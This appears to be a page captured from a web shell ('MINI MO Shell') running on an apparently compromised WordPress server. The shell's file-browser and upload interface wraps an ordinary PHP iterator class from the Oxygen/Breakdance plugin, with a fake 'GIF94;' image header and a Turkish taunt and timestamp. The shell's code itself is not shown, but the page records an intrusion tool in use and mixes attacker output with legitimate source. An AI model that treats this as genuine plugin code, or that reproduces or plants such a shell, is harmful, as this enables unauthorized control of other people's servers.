GIF94; MINI MO Shell - Tarih Gösterimli

MINI MINI MANI MO - TARİH GÖSTERİMLİ

Path : /var/www/wordpress/wp-content/plugins/oxygen/plugin/data/
File Upload :
Current File : /var/www/wordpress/wp-content/plugins/oxygen/plugin/data/recursive-tree-node-iterator.php

<?php

namespace Breakdance\Data;

class RecursiveTreeNodeIterator extends \RecursiveArrayIterator
{
    public function hasChildren(): bool
    {
        /** @var TreeNode|mixed $maybeNode */
        $maybeNode = $this->current();

        return is_array($maybeNode) && isset($maybeNode['children'], $maybeNode['id']) && is_array($maybeNode['children']);
    }

    public function getChildren(): ?\RecursiveArrayIterator
    {
        /** @var TreeNode $current */
        $current = $this->current();
        return new self($current['children']);
    }
}

OHA YOOO - Tarih: 2026-08-03 23:14:07